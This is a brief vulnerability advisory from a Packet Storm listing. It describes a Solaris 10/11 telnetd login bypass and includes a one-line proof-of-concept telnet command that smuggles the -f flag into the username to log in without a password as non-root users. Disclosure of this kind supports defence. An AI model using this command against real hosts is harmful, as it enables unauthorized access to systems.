Solaris 10/11 Telnetd Bypass

2007-02-11T00:00:00
ID PACKETSTORM:113309
Type packetstorm
Reporter Kingcope
Modified 2007-02-11T00:00:00

Description

                                        
                                            `telnetd on Solaris 10/11 allows for access bypass by passing a username to -l -f. This doesn't work for root but works for all other uids.  
  
POC:  
  
telnet -l "-fbin" target_address  
  
Discovered by kcope  
`